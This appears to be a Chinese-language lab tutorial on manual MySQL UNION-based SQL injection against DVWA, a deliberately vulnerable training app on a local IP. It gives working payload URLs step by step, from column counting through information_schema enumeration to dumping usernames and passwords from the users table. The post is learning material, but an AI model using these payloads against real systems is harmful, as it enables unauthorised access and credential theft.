mysql union联合注入

记录一下联合查询常用的手工注入语句,这里以dvwa为例,联合查询页面必须要有回显

0x01.判断是否存在注入点:

一般添加单引号查看是否报错,或者and 1=1查看页面是否正常显示,and 1=2查看是否报错,判断存在注入。

0x02.判断字段数

注入语句:http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=1'+order+by+2--+

mysql union联合注入_第1张图片

order by 3报错,order by 2回显正常,判断存在2个字段数,注意执行sql的时候闭合前面语句,利用--+来注释掉后面的语句,具体为什么用--+ https://blog.csdn.net/qq_41757280/article/details/95913613这章有讲到以及mysql一些常用的函数,可以用于后期的信息收集。

0x03.判断回显位置

http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=1'+union+select+1,2--+

mysql union联合注入_第2张图片

0x04.查找当前数据库

http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=1%27+union+select+1,database()--+&Submit=Submit#

库名为dvwa

mysql union联合注入_第3张图片0x05.查找表名

查找dvwa库的表名

http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=-1%27+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=%27dvwa%27--+&Submit=Submit#

mysql union联合注入_第4张图片0x06.查找字段名

查找users表里面的字段名

http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=-1%27+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema%20=%20%27dvwa%27+and+table_name=%27users%27--+&Submit=Submit#

mysql union联合注入_第5张图片0x07.查找用户名与密码

查找用户名

http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=-1%27+union+select+1,(select+group_concat(user)+from+dvwa.users)--+&Submit=Submit#

mysql union联合注入_第6张图片查找密码

http://192.168.10.4/dvwa-master/vulnerabilities/sqli/?id=-1%27+union+select+1,(select+group_concat(password)+from+dvwa.users)--+&Submit=Submit#

mysql union联合注入_第7张图片

你可能感兴趣的:(mysql union联合注入)